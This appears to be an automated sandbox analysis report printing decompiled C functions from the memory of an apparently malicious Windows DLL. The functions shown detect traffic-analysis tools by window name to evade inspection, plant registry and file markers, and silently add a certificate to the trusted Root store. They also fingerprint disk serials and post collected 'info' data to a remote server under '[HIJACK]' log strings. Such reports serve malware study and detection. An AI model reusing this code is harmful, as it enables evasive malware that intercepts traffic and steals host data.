FlsFree, xrefs: 1001197A

Memory Dump Source

Source File: 00000006.00000002.428439835.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.428427110.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000006.00000002.428502937.0000000010024000.00000002.00000001.sdmp Download File
Associated: 00000006.00000002.429061478.0000000010334000.00000004.00000001.sdmp Download File
Associated: 00000006.00000002.429077803.0000000010339000.00000002.00000001.sdmp Download File
Associated: 00000006.00000002.429089279.000000001033A000.00000004.00000001.sdmp Download File

Similarity

API ID: AddressProc__encode_pointer$__decode_pointer$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__initptd__mtterm
String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
API String ID: 2657569430-3819984048
Opcode ID: 93fa50452aaafecd530976381e4c398f97edee3f3156b12a78c3b9aad9b59f54
Instruction ID: 808ad0af3f4b6be62188e372f3d3457f3cdf16e918fc8b475f3418519981f6d4
Opcode Fuzzy Hash: 93fa50452aaafecd530976381e4c398f97edee3f3156b12a78c3b9aad9b59f54
Instruction Fuzzy Hash: 16318F358042219AE709EF76ACC56893AB9EB84296F52062AF569DF1E3DF31D4C09B10

Uniqueness

Uniqueness Score: -1.00%

Function 10019430, Relevance: 40.4, APIs: 11, Strings: 12, Instructions: 188
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E10019430(void* __ebx, void* __edi, void* __eflags, struct HWND__* _a4) {
				char _v267;
				char _v268;
				char _v531;
				char _v532;
				void* _t35;
				void* _t37;
				void* _t38;
				void* _t39;
				void* _t41;
				void* _t42;
				void* _t43;
				void* _t45;
				void* _t46;
				void* _t48;
				void* _t51;
				void* _t53;
				void* _t55;
				void* _t57;
				void* _t61;
				void* _t66;
				void* _t88;
				void* _t91;
				void* _t92;
				void* _t93;
				void* _t94;
				void* _t95;
				void* _t96;
				void* _t97;
				void* _t98;
				void* _t99;
				void* _t100;

				_t87 = __edi;
				_t70 = __ebx;
				_v532 = 0;
				E1000CF80(__edi,  &_v531, 0, 0x103);
				_v268 = 0;
				E1000CF80(_t87,  &_v267, 0, 0x103);
				GetClassNameA(_a4,  &_v532, 0x104);
				GetWindowTextA(_a4,  &_v268, 0x104);
				_t35 = E1000CAD0( &_v532);
				_t91 = _t88 + 0x1c;
				_t108 = _t35;
				if(_t35 <= 0) {
					L30:
					return 1;
				}
				_t37 = E10019390(__ebx, _t87, _t108,  &_v532, "Afx:400000:8:10003:0:");
				_t92 = _t91 + 8;
				if(_t37 == 0) {
					_t38 = E10019390(__ebx, _t87, __eflags,  &_v532, "TCPViewClass");
					_t93 = _t92 + 8;
					__eflags = _t38;
					if(__eflags == 0) {
						_t39 = E10019390(__ebx, _t87, __eflags,  &_v532, "TStdHttpAnalyzerForm");
						_t94 = _t93 + 8;
						__eflags = _t39;
						if(__eflags == 0) {
							_t41 = E10019390(_t70, _t87, __eflags,  &_v532, "gdkWindowToplevel");
							_t95 = _t94 + 8;
							__eflags = _t41;
							if(__eflags == 0) {
								_t42 = E10019390(_t70, _t87, __eflags,  &_v532, "XTPMainFrame");
								_t96 = _t95 + 8;
								__eflags = _t42;
								if(_t42 == 0) {
									_t43 = E1000CAD0( &_v268);
									_t97 = _t96 + 4;
									__eflags = _t43;
									if(__eflags <= 0) {
										L20:
										_t45 = E1000CAD0( &_v268);
										_t98 = _t97 + 4;
										__eflags = _t45;
										if(__eflags <= 0) {
											L23:
											_t46 = E10019390(_t70, _t87, __eflags,  &_v532, "SunAwtFrame");
											_t99 = _t98 + 8;
											__eflags = _t46;
											if(_t46 == 0) {
												goto L30;
											}
											_t48 = E1000CAD0( &_v268);
											_t100 = _t99 + 4;
											__eflags = _t48;
											if(__eflags <= 0) {
												L27:
												__eflags = E1000CAD0( &_v268);
												if(__eflags <= 0) {
													goto L30;
												}
												_t51 = E10019390(_t70, _t87, __eflags,  &_v268, "Burp Suite");
												__eflags = _t51;
												if(_t51 == 0) {
													goto L30;
												}
												 *0x10335dcc = 1;
												return 0;
											}
											_t53 = E10019390(_t70, _t87, __eflags,  &_v268, "Charles");
											_t100 = _t100 + 8;
											__eflags = _t53;
											if(_t53 == 0) {
												goto L27;
											}
											 *0x10335dcc = 1;
											return 0;
										}
										_t55 = E10019390(_t70, _t87, __eflags,  &_v268, "ASExplorer");
										_t98 = _t98 + 8;
										__eflags = _t55;
										if(__eflags == 0) {
											goto L23;
										}
										 *0x10335dcc = 1;
										return 0;
									}
									_t57 = E10019390(_t70, _t87, __eflags,  &_v268, "Telerik Fiddler");
									_t97 = _t97 + 8;
									__eflags = _t57;
									if(_t57 == 0) {
										goto L20;
									}
									 *0x10335dcc = 1;
									return 0;
								}
								__eflags = E1000CAD0( &_v268);
								if(__eflags <= 0) {
									L16:
									goto L30;
								}
								_t61 = E10019390(_t70, _t87, __eflags,  &_v268, "HTTP Debugger");
								__eflags = _t61;
								if(_t61 == 0) {
									goto L16;
								}
								 *0x10335dcc = 1;
								return 0;
							}
							 *0x10335dcc = 1;
							return 0;
						}
						 *0x10335dcc = 1;
						return 0;
					}
					 *0x10335dcc = 1;
					return 0;
				}
				_t66 = E1000CAD0( &_v268);
				_t110 = _t66;
				if(_t66 <= 0 || E10019390(__ebx, _t87, _t110,  &_v268, "WPE") == 0) {
					goto L30;
				} else {
					 *0x10335dcc = 1;
					return 0;
				}
			}

APIs

_memset.LIBCMT ref: 1001944E
_memset.LIBCMT ref: 1001946B
GetClassNameA.USER32(?,00000000,00000104), ref: 10019483
GetWindowTextA.USER32 ref: 10019499
_strlen.LIBCMT ref: 100194A6

Part of subcall function 10019390: _strlen.LIBCMT ref: 1001939B
Part of subcall function 10019390: _strlen.LIBCMT ref: 100193A9

_strlen.LIBCMT ref: 100194D5

Strings

Telerik Fiddler, xrefs: 10019605
XTPMainFrame, xrefs: 10019599
SunAwtFrame, xrefs: 10019674
TStdHttpAnalyzerForm, xrefs: 1001953D
gdkWindowToplevel, xrefs: 1001956B
Afx:400000:8:10003:0:, xrefs: 100194B6
TCPViewClass, xrefs: 1001950F
HTTP Debugger, xrefs: 100195C4
ASExplorer, xrefs: 10019646
Charles, xrefs: 1001969F
WPE, xrefs: 100194E1
Burp Suite, xrefs: 100196DA

Memory Dump Source

Source File: 00000006.00000002.428439835.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.428427110.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000006.00000002.428502937.0000000010024000.00000002.00000001.sdmp Download File
Associated: 00000006.00000002.429061478.0000000010334000.00000004.00000001.sdmp Download File
Associated: 00000006.00000002.429077803.0000000010339000.00000002.00000001.sdmp Download File
Associated: 00000006.00000002.429089279.000000001033A000.00000004.00000001.sdmp Download File

Similarity

API ID: _strlen$_memset$ClassNameTextWindow
String ID: ASExplorer$Afx:400000:8:10003:0:$Burp Suite$Charles$HTTP Debugger$SunAwtFrame$TCPViewClass$TStdHttpAnalyzerForm$Telerik Fiddler$WPE$XTPMainFrame$gdkWindowToplevel
API String ID: 1565133231-1140939848
Opcode ID: 0ad7c26c6e480e82f6b3811a957d2b8bad39d8203231eaa86610e8d92c2d0a26
Instruction ID: 51e88d16b42fffacdf90acd9036bc3218a7670d11f06c4b4a6332502e68566f8
Opcode Fuzzy Hash: 0ad7c26c6e480e82f6b3811a957d2b8bad39d8203231eaa86610e8d92c2d0a26
Instruction Fuzzy Hash: 7851B6B991430956E710CB71AC89FDA72B8EB20345F440864F91ADD182FBB1F7C8CB61

Uniqueness

Uniqueness Score: -1.00%

Function 1001FA90, Relevance: 22.9, APIs: 7, Strings: 6, Instructions: 137
COMMON

Download Yara Rule

C-Code - Quality: 84%

			E1001FA90(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				char _v267;
				char _v268;
				char _v531;
				char _v532;
				char _v536;
				char _v803;
				char _v804;
				void* _t44;
				void* _t46;
				void* _t48;
				void* _t50;
				void* _t52;
				void* _t55;
				void* _t94;

				_t94 = __eflags;
				_t77 = __edi;
				_v536 = 0;
				_v532 = 0;
				E1000CF80(__edi,  &_v531, 0, 0x103);
				__imp__SHGetSpecialFolderPathA(0,  &_v532, 0x1a, 0);
				E1000CDB3( &_v532,  &_v532, 0x104, "\\Microsoft\\Windows\\win_a.dat");
				_v804 = 0;
				E1000CF80(_t77,  &_v803, 0, 0x103);
				__imp__SHGetSpecialFolderPathA(0,  &_v804, 0x1a, 0);
				E1000CDB3( &_v804,  &_v804, 0x104, "\\Microsoft\\Windows\\4b5ce2fe28308fd9");
				_v268 = 0;
				E1000CF80(_t77,  &_v267, 0, 0x103);
				E1001F9F0(__ebx, _t77, __esi, _t94,  &_v268);
				_t44 = E1001F6E0(_a8, _t94, 0x80000002, "SOFTWARE\\Microsoft\\XAML_A", _a4, _a8);
				_t95 = _t44;
				if(_t44 != 0) {
					_t46 = E1001F6E0(_a4, _t95, 0x80000002, "SOFTWARE\\Microsoft\\XAML_B", _a4, _a8);
					_t96 = _t46;
					if(_t46 != 0) {
						_t48 = E1001F650( &_v532, _t96,  &_v532, _a4, _a8);
						_t97 = _t48;
						if(_t48 != 0) {
							_t50 = E1001F6E0( &_v532, _t97, 0x80000002, "SOFTWARE\\Microsoft\\a0b923820dcc509a", _a4, _a8);
							_t98 = _t50;
							if(_t50 != 0) {
								_t52 = E1001F6E0(_a8, _t98, 0x80000002, "SOFTWARE\\Microsoft\\9d4c2f636f067f89", _a4, _a8);
								_t99 = _t52;
								if(_t52 != 0 && E1001F650(_a4, _t99,  &_v804, _a4, _a8) != 0) {
									_t55 = E1001F780(__ebx, _t77, __esi, _a4, _a8);
									_t101 = _t55;
									if(_t55 != 0 && E1001F6E0( &_v268, _t101, 0x80000002,  &_v268, _a4, _a8) != 0) {
										_v536 = 1;
									}
								}
							}
						}
					}
				}
				return _v536;
			}

0x1001fa90
0x1001fa90
0x1001fa99
0x1001faa3
0x1001fab8
0x1001facd
0x1001fae4
0x1001faec
0x1001fb01
0x1001fb16
0x1001fb2d
0x1001fb35
0x1001fb4a
0x1001fb59
0x1001fb73
0x1001fb7b
0x1001fb7d
0x1001fb95
0x1001fb9d
0x1001fb9f
0x1001fbb4
0x1001fbbc
0x1001fbbe
0x1001fbd6
0x1001fbde
0x1001fbe0
0x1001fbf4
0x1001fbfc
0x1001fbfe
0x1001fc23
0x1001fc2b
0x1001fc2d
0x1001fc4f
0x1001fc4f
0x1001fc2d
0x1001fbfe
0x1001fbe0
0x1001fbbe
0x1001fb9f
0x1001fc62

APIs

_memset.LIBCMT ref: 1001FAB8
SHGetSpecialFolderPathA.SHELL32(00000000,00000000,0000001A,00000000), ref: 1001FACD
_strcat_s.LIBCMT ref: 1001FAE4
_memset.LIBCMT ref: 1001FB01
SHGetSpecialFolderPathA.SHELL32(00000000,00000000,0000001A,00000000), ref: 1001FB16
_strcat_s.LIBCMT ref: 1001FB2D
_memset.LIBCMT ref: 1001FB4A

Part of subcall function 1001F9F0: _memset.LIBCMT ref: 1001FA0E
Part of subcall function 1001F9F0: _strcat_s.LIBCMT ref: 1001FA41
Part of subcall function 1001F9F0: _sprintf.LIBCMT ref: 1001FA68

Part of subcall function 1001F780: CryptStringToBinaryA.CRYPT32(10026F28,00000000,00000000,00000000,00000000,00000000,00000000), ref: 1001F7BE
Part of subcall function 1001F780: CryptStringToBinaryA.CRYPT32(10026F28,00000000,00000000,00000000,00000000,00000000,00000000), ref: 1001F803
Part of subcall function 1001F780: CertCreateCertificateContext.CRYPT32(00000001,00000000,00000000), ref: 1001F813
Part of subcall function 1001F780: CertOpenStore.CRYPT32(0000000A,00000000,00000000,00024000,Root), ref: 1001F842
Part of subcall function 1001F780: CertAddCertificateContextToStore.CRYPT32(00000000,00000000,00000001,00000000), ref: 1001F861
Part of subcall function 1001F780: CertCloseStore.CRYPT32(00000000,00000001), ref: 1001F9D2
Part of subcall function 1001F780: CertFreeCertificateContext.CRYPT32(00000000), ref: 1001F9DC

Strings

SOFTWARE\Microsoft\9d4c2f636f067f89, xrefs: 1001FBEA
SOFTWARE\Microsoft\XAML_B, xrefs: 1001FB8B
\Microsoft\Windows\4b5ce2fe28308fd9, xrefs: 1001FB1C
\Microsoft\Windows\win_a.dat, xrefs: 1001FAD3
SOFTWARE\Microsoft\XAML_A, xrefs: 1001FB69
SOFTWARE\Microsoft\a0b923820dcc509a, xrefs: 1001FBCC

Memory Dump Source

Source File: 00000006.00000002.428439835.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.428427110.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000006.00000002.428502937.0000000010024000.00000002.00000001.sdmp Download File
Associated: 00000006.00000002.429061478.0000000010334000.00000004.00000001.sdmp Download File
Associated: 00000006.00000002.429077803.0000000010339000.00000002.00000001.sdmp Download File
Associated: 00000006.00000002.429089279.000000001033A000.00000004.00000001.sdmp Download File

Similarity

API ID: Cert$_memset$CertificateContextStore_strcat_s$BinaryCryptFolderPathSpecialString$CloseCreateFreeOpen_sprintf
String ID: SOFTWARE\Microsoft\9d4c2f636f067f89$SOFTWARE\Microsoft\XAML_A$SOFTWARE\Microsoft\XAML_B$SOFTWARE\Microsoft\a0b923820dcc509a$\Microsoft\Windows\4b5ce2fe28308fd9$\Microsoft\Windows\win_a.dat
API String ID: 475603772-4188859120
Opcode ID: 0a5fcaf454aad501ee2a671e7f0111277b416851bab7cb84d5da4d1715e2ef5c
Instruction ID: 4e31c407b2421ecadd55cccd68f5b7507d928531dec073e07e65c36de6934fcb
Opcode Fuzzy Hash: 0a5fcaf454aad501ee2a671e7f0111277b416851bab7cb84d5da4d1715e2ef5c
Instruction Fuzzy Hash: BF41577AA00108B7E704DAA0DC46FF9336CDB64344F404098FE1C9A182EB71EB848BA1

Uniqueness

Uniqueness Score: -1.00%

Function 100212F0, Relevance: 16.7, APIs: 11, Instructions: 232
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E100212F0(void* __ebx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr* _a8, void* _a12, intOrPtr* _a16, intOrPtr* _a20, intOrPtr* _a24) {
				char _v8;
				char _v12;
				char* _v16;
				char* _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v35;
				char _v39;
				char _v43;
				char _v44;
				void* _t86;
				void* _t88;
				intOrPtr _t91;
				void* _t92;
				void* _t120;
				void* _t140;
				void* _t141;
				void* _t191;
				void* _t192;
				void* _t193;
				void* _t194;
				void* _t195;
				void* _t196;

				_t192 = __esi;
				_t191 = __edi;
				_t141 = __ebx;
				_v32 = 0;
				_v20 = "https://";
				_v16 = "http://";
				_v12 = 0;
				_v8 = 0;
				_v28 = 0;
				_v24 = 0;
				_v44 = 0;
				_v43 = 0;
				_v39 = 0;
				_v35 = 0;
				_t86 = E10001A50(_a4, _v20);
				_t194 = _t193 + 8;
				if(_t86 != 0) {
					L2:
					_v8 = _a4;
					_t88 = E10001A50(_a4, _v20);
					_t195 = _t194 + 8;
					if(_t88 == 0) {
						 *_a8 = 0;
						_v8 = _v8 + 7;
						 *_a20 = 0x50;
					} else {
						 *_a8 = 1;
						_v8 = _v8 + 8;
						 *_a20 = 0x1bb;
					}
					_t91 = E10001A50(_v8, "/");
					_t196 = _t195 + 8;
					_v28 = _t91;
					if(_v28 == 0) {
						_t92 = E1000CAD0(_v8);
						_t196 = _t196 + 4;
						_v24 = _t92 + 1;
					} else {
						_v24 = _v28 - _v8 + 1;
					}
					 *_a12 = L1000CEAF(_t141, _v24, _t191, _t192, _v24);
					E1000CF80(_t191,  *_a12, 0, _v24);
					E1000D1F0(_t141, _t191, _t192,  *_a12, _v8, _v24 - 1);
					_v28 = E10001A50(_v8, "/");
					if(_v28 == 0) {
						_v24 = 2;
						 *_a24 = L1000CEAF(_t141, _v24, _t191, _t192, _v24);
						E1000CF80(_t191,  *_a24, 0, _v24);
						E1000E2E0( *_a24, "/");
					} else {
						_v24 = E1000CAD0(_v8) - _v28 - _v8 + 1;
						 *_a24 = L1000CEAF(_t141, _v28 - _v8, _t191, _t192, _v24);
						E1000CF80(_t191,  *_a24, 0, _v24);
						E1000E2E0( *_a24, _v28);
					}
					_v8 = E10001A50( *_a12, ":");
					if(_v8 == 0) {
						_t181 = _a12;
						_v24 = E1000CAD0( *_a12) + 1;
					} else {
						_v24 = _v8 -  *_a12 + 1;
						_t120 = E1000CAD0( *_a12);
						_t181 =  &_v44;
						E1000D1F0(_t141, _t191, _t192,  &_v44, _v8 + 1, _t120 - _v24);
						E1000E645( &_v44, "%d", _a20);
					}
					 *_a16 = L1000CEAF(_t141, _t181, _t191, _t192, _v24);
					E1000CF80(_t191,  *_a16, 0, _v24);
					E1000D1F0(_t141, _t191, _t192,  *_a16,  *_a12, _v24 - 1);
					_v32 = 1;
				} else {
					_t140 = E10001A50(_a4, _v16);
					_t194 = _t194 + 8;
					if(_t140 != 0) {
						goto L2;
					}
				}
				return _v32;
			}

APIs

_strlen.LIBCMT ref: 100213E0
_memset.LIBCMT ref: 1002140B
_strlen.LIBCMT ref: 1002144A
_memset.LIBCMT ref: 1002147D
_strcat.LIBCMT ref: 1002148F
_memset.LIBCMT ref: 100214BD
_strcat.LIBCMT ref: 100214D0
_strlen.LIBCMT ref: 10021508
_sscanf.LIBCMT ref: 10021534

Part of subcall function 1000E645: _vscan_fn.LIBCMT ref: 1000E65A

_strlen.LIBCMT ref: 10021544
_memset.LIBCMT ref: 1002156F

Memory Dump Source

Source File: 00000006.00000002.428439835.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.428427110.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000006.00000002.428502937.0000000010024000.00000002.00000001.sdmp Download File
Associated: 00000006.00000002.429061478.0000000010334000.00000004.00000001.sdmp Download File
Associated: 00000006.00000002.429077803.0000000010339000.00000002.00000001.sdmp Download File
Associated: 00000006.00000002.429089279.000000001033A000.00000004.00000001.sdmp Download File

Similarity

API ID: _memset_strlen$_strcat$_sscanf_vscan_fn
String ID:
API String ID: 3056589307-0
Opcode ID: 403152bf92db43274024c9a4f77463d3bbea5a1632cdc500d382b8df9f3c8fe4
Instruction ID: 4b51f2b05251f5ad84218d7a5ee60ac0fbdcfae77a21dec9d6b54221d6e01b8d
Opcode Fuzzy Hash: 403152bf92db43274024c9a4f77463d3bbea5a1632cdc500d382b8df9f3c8fe4
Instruction Fuzzy Hash: 82912BF9E00209EFDB04CFA4D981AEFB7B5EF48344F104568E905AB345E635EA14CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 10022D00, Relevance: 15.9, APIs: 2, Strings: 7, Instructions: 174
COMMON

Download Yara Rule

C-Code - Quality: 84%

			E10022D00(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v8;
				intOrPtr _v16;
				char _v44;
				char _v48;
				char _v76;
				char _v104;
				char _v132;
				intOrPtr _v136;
				char _v164;
				char _v192;
				char _v220;
				signed int _v224;
				intOrPtr _v228;
				intOrPtr _v232;
				intOrPtr _v236;
				intOrPtr _v240;
				intOrPtr _v244;
				intOrPtr _v248;
				void* __ebp;
				intOrPtr _t77;
				void* _t109;
				void* _t110;
				void* _t113;
				intOrPtr _t154;
				intOrPtr _t157;
				void* _t160;
				void* _t164;

				_t164 = __eflags;
				_t156 = __esi;
				_t155 = __edi;
				_t114 = __ebx;
				_push(0xffffffff);
				_push(E100232E0);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t157;
				_v224 = 0;
				_push(_a12);
				_push(0x4c);
				_push("post_info");
				E1001F230(__edi, "[HIJACK][%s][%s][%d]: data = %s\n", PathFindFileNameA(".\\post_info.cpp"));
				_v48 = 0;
				_t77 = E10022530(__ebx, __edi, __esi, _t164, _a12);
				_t160 = _t157 - 0xe8 + 0x18;
				_v136 = _t77;
				E10001160( &_v132, _t164, 0x10025ca2);
				_v8 = 0;
				E10001160( &_v104, _t164, "info=");
				_v8 = 1;
				_v228 = E10001160( &_v164, _t164, _v136);
				_v232 = _v228;
				_v8 = 2;
				E10001A90( &_v104, _v232);
				_v8 = 1;
				E100011A0( &_v164);
				E10001160( &_v44, _t164, 0x10025ca3);
				_v8 = 3;
				E10001160( &_v76, _t164, 0x10025cb9);
				_v8 = 4;
				_v48 = 0;
				while(1) {
					_t165 = _v48 - 6;
					if(_v48 > 6) {
						break;
					}
					E100011C0( &_v132, 0x10025cba);
					_v236 = E10022710(_t114, _t155, _t156, _t165,  &_v192, _v48);
					_v240 = _v236;
					_v8 = 5;
					E10001A70( &_v132, _v240);
					_v8 = 4;
					E100011A0( &_v192);
					_v244 = E10001160( &_v220, _t165, _a8);
					_v248 = _v244;
					_v8 = 6;
					E10001A90( &_v132, _v248);
					_v8 = 4;
					E100011A0( &_v220);
					_push(E100011E0( &_v132));
					_push(0x61);
					_push("post_info");
					E1001F230(_t155, "[HIJACK][%s][%s][%d]: url = %s\n", PathFindFileNameA(".\\post_info.cpp"));
					E100011C0( &_v44, 0x10025cbb);
					E100011C0( &_v76, 0x10025cce);
					_t109 = E10001200( &_v104);
					_t110 = E100011E0( &_v104);
					E10021C30(_t114, _t155, _t156, _t165, 0, 0, 0, E100011E0( &_v132), 2, 1, 0, _t110, _t109, 0, 0, 0, 0, 0, 0,  &_v44,  &_v76);
					_t160 = _t160 + 0x60;
					_t113 = E10001200( &_v44);
					_t166 = _t113;
					if(_t113 == 0) {
						_t154 = _v48 + 1;
						__eflags = _t154;
						_v48 = _t154;
						continue;
					} else {
					}
					break;
				}
				_push(_v136);
				E1000CA40(_t114, _t155, _t156, _t166);
				E10001110(_a4, _t166,  &_v76);
				_v224 = _v224 | 0x00000001;
				_v8 = 3;
				E100011A0( &_v76);
				_v8 = 1;
				E100011A0( &_v44);
				_v8 = 0;
				E100011A0( &_v104);
				_v8 = 0xffffffff;
				E100011A0( &_v132);
				 *[fs:0x0] = _v16;
				return _a4;
			}

0x10022d00
0x10022d00
0x10022d00
0x10022d00
0x10022d03
0x10022d05
0x10022d10
0x10022d11
0x10022d1e
0x10022d2b
0x10022d2c
0x10022d2e
0x10022d44
0x10022d4c
0x10022d57
0x10022d5c
0x10022d5f
0x10022d6d
0x10022d72
0x10022d81
0x10022d86
0x10022d9c
0x10022da8
0x10022dae
0x10022dbc
0x10022dc1
0x10022dcb
0x10022dd8
0x10022ddd
0x10022de9
0x10022dee
0x10022df2
0x10022e04
0x10022e04
0x10022e08
0x00000000
0x00000000
0x10022e16
0x10022e2e
0x10022e3a
0x10022e40
0x10022e4e
0x10022e53
0x10022e5d
0x10022e71
0x10022e7d
0x10022e83
0x10022e91
0x10022e96
0x10022ea0
0x10022ead
0x10022eae
0x10022eb0
0x10022ec6
0x10022ed6
0x10022ee3
0x10022eff
0x10022f08
0x10022f23
0x10022f28
0x10022f2e
0x10022f33
0x10022f35
0x10022dfe
0x10022dfe
0x10022e01
0x00000000
0x00000000
0x10022f37
0x00000000
0x10022f35
0x10022f44
0x10022f45
0x10022f54
0x10022f62
0x10022f68
0x10022f6f
0x10022f74
0x10022f7b
0x10022f80
0x10022f87
0x10022f8c
0x10022f96
0x10022fa1
0x10022fab

APIs

PathFindFileNameA.SHLWAPI(.\post_info.cpp,post_info,0000004C,?), ref: 10022D38

Part of subcall function 1001F230: _memset.LIBCMT ref: 1001F25B
Part of subcall function 1001F230: OutputDebugStringA.KERNEL32(?,?,?,?,?,10022D49,[HIJACK][%s][%s][%d]: data = %s), ref: 1001F293

Part of subcall function 10022530: _memset.LIBCMT ref: 10022584
Part of subcall function 10022530: _strlen.LIBCMT ref: 100225B8
Part of subcall function 10022530: _memset.LIBCMT ref: 10022626
Part of subcall function 10022530: _strlen.LIBCMT ref: 10022632

Part of subcall function 10022710: _memset.LIBCMT ref: 1002276B
Part of subcall function 10022710: GetLocalTime.KERNEL32(00000000,?,?,http://), ref: 1002278C

PathFindFileNameA.SHLWAPI(.\post_info.cpp,post_info,00000061,00000000,?,?,?,info=,10025CA2), ref: 10022EBA

Part of subcall function 10021C30: WinHttpOpen.WINHTTP(A WinHTTP Example Program/1.0,00000000,00000000,00000000,00000000), ref: 10021D64
Part of subcall function 10021C30: WinHttpSetOption.WINHTTP(00000000,00000026,00000003,0000000C), ref: 10021DAC

Strings

[HIJACK][%s][%s][%d]: data = %s, xrefs: 10022D3F
.\post_info.cpp, xrefs: 10022EB5
info=, xrefs: 10022D79
.\post_info.cpp, xrefs: 10022D33
post_info, xrefs: 10022EB0
[HIJACK][%s][%s][%d]: url = %s, xrefs: 10022EC1
post_info, xrefs: 10022D2E

Memory Dump Source

Source File: 00000006.00000002.428439835.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.428427110.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000006.00000002.428502937.0000000010024000.00000002.00000001.sdmp Download File
Associated: 00000006.00000002.429061478.0000000010334000.00000004.00000001.sdmp Download File
Associated: 00000006.00000002.429077803.0000000010339000.00000002.00000001.sdmp Download File
Associated: 00000006.00000002.429089279.000000001033A000.00000004.00000001.sdmp Download File

Similarity

API ID: _memset$FileFindHttpNamePath_strlen$DebugLocalOpenOptionOutputStringTime
String ID: .\post_info.cpp$.\post_info.cpp$[HIJACK][%s][%s][%d]: data = %s$[HIJACK][%s][%s][%d]: url = %s$info=$post_info$post_info
API String ID: 2213638552-152146038
Opcode ID: 73bb963f22ba2c1732fff04cfbf30ba04fa5a5e8588cdd7c25535a6641d5ae82
Instruction ID: 8607acd66d3c23fd638f037442e906d60192c638072a9ab774b96db5fff67154
Opcode Fuzzy Hash: 73bb963f22ba2c1732fff04cfbf30ba04fa5a5e8588cdd7c25535a6641d5ae82
Instruction Fuzzy Hash: 57714E75D01248EBEB18DB94DD52BEEBB74EF18384F908098F60A77181EB712B45CB61

Uniqueness

Uniqueness Score: -1.00%

Function 1001D5C0, Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 145
fileCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E1001D5C0(void* __edi, char* _a4) {
				intOrPtr _v8;
				struct _OVERLAPPED* _v12;
				signed int _v16;
				struct _OVERLAPPED* _v20;
				struct _OVERLAPPED* _v24;
				intOrPtr _v28;
				void* _v32;
				short _v548;
				char _v1010;
				char _v1068;
				char _v1070;
				intOrPtr _v1084;
				intOrPtr _v1092;
				intOrPtr _v1096;
				intOrPtr _v1100;
				intOrPtr _v1104;
				void _v1108;
				char _v2132;
				struct _OVERLAPPED* _v2136;
				char _v2137;
				long _v2144;
				struct _OVERLAPPED* _v2148;
				intOrPtr _v2152;
				char* _v2156;
				intOrPtr _t91;
				intOrPtr _t96;
				void* _t125;
				void* _t126;
				void* _t127;

				_t125 = __edi;
				_v20 = 0;
				_v2136 = 0;
				_v24 = 0;
				do {
					wsprintfW( &_v548, L"\\\\.\\Scsi%d:", _v20);
					_t127 = _t127 + 0xc;
					_v32 = CreateFileW( &_v548, 0xc0000000, 3, 0, 3, 0, 0);
					if(_v32 != 0xffffffff) {
						_v12 = 0;
						while(1 != 0) {
							E1000CF80(_t125,  &_v1108, 0, 0x22d);
							_t127 = _t127 + 0xc;
							_v1104 = 0x49534353;
							_v1100 = 0x4b534944;
							_v1068 = _v12;
							_v1108 = 0x1c;
							_v1096 = 0x2710;
							_v1084 = 0x211;
							_v1092 = 0x1b0501;
							_v1070 = 0xec;
							if(DeviceIoControl(_v32, 0x4d008,  &_v1108, 0x3c,  &_v1108, 0x22d,  &_v2144, 0) == 0 || _v1010 == 0) {
								L20:
								if(_v2136 != 0) {
									L23:
								} else {
									_v12 =  &(_v12->Internal);
									if(_v12 < 2) {
										goto L23;
									} else {
										continue;
									}
								}
							} else {
								_v16 = 0;
								do {
									 *(_t126 + _v16 * 4 - 0x850) =  *(_t126 + _v16 * 2 - 0x424) & 0x0000ffff;
									_v16 = _v16 + 1;
								} while (_v16 < 0x100);
								_t91 = E1001CDD0( &_v2132);
								_t127 = _t127 + 4;
								_v28 = _t91;
								_v2148 = 0;
								_v8 = 0x104;
								_v2156 = _a4;
								_v2152 = _v28 - _a4;
								while(_v8 != 0x80000106) {
									_v2137 =  *((intOrPtr*)(_v2156 + _v2152));
									if(_v2137 != 0) {
										 *_v2156 = _v2137;
										_v2156 = _v2156 + 1;
										_t96 = _v8 - 1;
										_v8 = _t96;
										if(_t96 != 0) {
											continue;
										} else {
											L17:
											_v2156 = _v2156 - 1;
											_v2148 = 0x8007007a;
										}
									} else {
										break;
									}
									L18:
									 *_v2156 = 0;
									if(_v2148 < 0) {
										goto L20;
									} else {
										goto L24;
									}
									goto L25;
								}
								if(_v8 == 0) {
									goto L17;
								} else {
								}
								goto L18;
							}
							L25:
							CloseHandle(_v32);
							_v20 = _v24;
							goto L26;
						}
						L24:
						_v2136 = 1;
						goto L25;
					}
					L26:
					_v20 =  &(_v20->Internal);
					_v24 = _v20;
				} while (_v20 < 0x10);
				return _v2136;
			}

0x1001d5c0
0x1001d5c9
0x1001d5d0
0x1001d5da
0x1001d5e1
0x1001d5f1
0x1001d5f7
0x1001d616
0x1001d61d
0x1001d623
0x1001d62a
0x1001d645
0x1001d64a
0x1001d64d
0x1001d657
0x1001d664
0x1001d66a
0x1001d674
0x1001d67e
0x1001d688
0x1001d692
0x1001d6c8
0x1001d7ce
0x1001d7d5
0x1001d7ed
0x1001d7d7
0x1001d7e0
0x1001d7e6
0x00000000
0x1001d7e8
0x00000000
0x1001d7e8
0x1001d7e6
0x1001d6dd
0x1001d6dd
0x1001d6e4
0x1001d6f2
0x1001d6ff
0x1001d702
0x1001d712
0x1001d717
0x1001d71a
